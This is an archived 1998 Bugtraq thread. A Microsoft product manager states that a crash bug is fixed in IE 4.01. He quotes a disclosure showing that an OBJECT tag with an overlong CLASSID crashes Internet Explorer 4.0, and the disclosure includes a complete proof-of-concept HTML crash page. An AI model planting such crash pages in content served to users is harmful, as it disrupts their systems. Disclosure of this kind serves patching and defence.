[7483] in bugtraq
Re: Object tag crashes Internet Explorer 4.0
daemon@ATHENA.MIT.EDU (Jason Garms)
Thu Jul 30 12:10:07 1998
Date: Wed, 29 Jul 1998 20:27:27 -0700
Reply-To: Jason Garms <jasong@MICROSOFT.COM>
From: Jason Garms <jasong@MICROSOFT.COM>
X-To: Georgi Guninski <guninski@HOTMAIL.COM>
To: BUGTRAQ@NETSPACE.ORG
Georgi,
The bug that caused the browser to crash in this way was fixed in IE 4.01
(which BTW is what's in Win98). People using 4.01 or 4.01 with SP1 cannot be
crashed in this way.
Thanks,
-JasonG
Jason Garms, JasonG@Microsoft.Com
Product Manager
Windows NT Security
Microsoft Corporation
-----Original Message-----
From: Georgi Guninski [mailto:guninski@HOTMAIL.COM]
Sent: Tuesday, July 28, 1998 10:11 AM
To: BUGTRAQ@NETSPACE.ORG
Subject: Object tag crashes Internet Explorer 4.0
The <OBJECT> tag seems to crash Internet Explorer 4.0 under Win95 (don't
know about other versions/OS).
The following:
<OBJECT CLASSID=____More than 250 characters here____></OBJECT>
opens a dialog box "IEXPLORE: ...illegal operation" and closes IE 4.0,
or a blue screen with "Fatal exception 0E" and you need to reboot.
I don't think this is exploitable(?), but it is a bad "feature".
Georgi Guninski
guninski@hotmail.com
http://www.geocities.com/ResearchTriangle/1711
-------------------------------------Cut here: Object.html -------
<HTML>
Trying to crash IE 4.0
<OBJECT
CLASSID=11111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111>
</OBJECT>
</HTML>
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
